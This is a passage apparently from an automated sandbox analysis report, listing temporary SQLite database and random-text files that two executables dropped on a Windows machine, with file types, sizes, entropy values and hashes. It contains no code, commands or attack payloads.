                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp5CCD.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6190.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.694982189683734
                                                                              Encrypted:false
                                                                              SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                              MD5:E49F84B05A175C231342E6B705A24A44
                                                                              SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                              SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                              SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                              Malicious:false
                                                                              Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                              C:\Users\user\AppData\Local\Temp\tmp61A0.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.700014595314478
                                                                              Encrypted:false
                                                                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                              Malicious:false
                                                                              Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                              C:\Users\user\AppData\Local\Temp\tmp61A1.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.694982189683734
                                                                              Encrypted:false
                                                                              SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                              MD5:E49F84B05A175C231342E6B705A24A44
                                                                              SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                              SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                              SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                              Malicious:false
                                                                              Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                              C:\Users\user\AppData\Local\Temp\tmp61A2.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.700014595314478
                                                                              Encrypted:false
                                                                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                              Malicious:false
                                                                              Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                              C:\Users\user\AppData\Local\Temp\tmp653E.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp654F.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp655F.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6570.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6581.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp65A1.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6F79.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6F8A.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6F8B.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6F9C.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6F9D.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp6FAD.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp8471.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
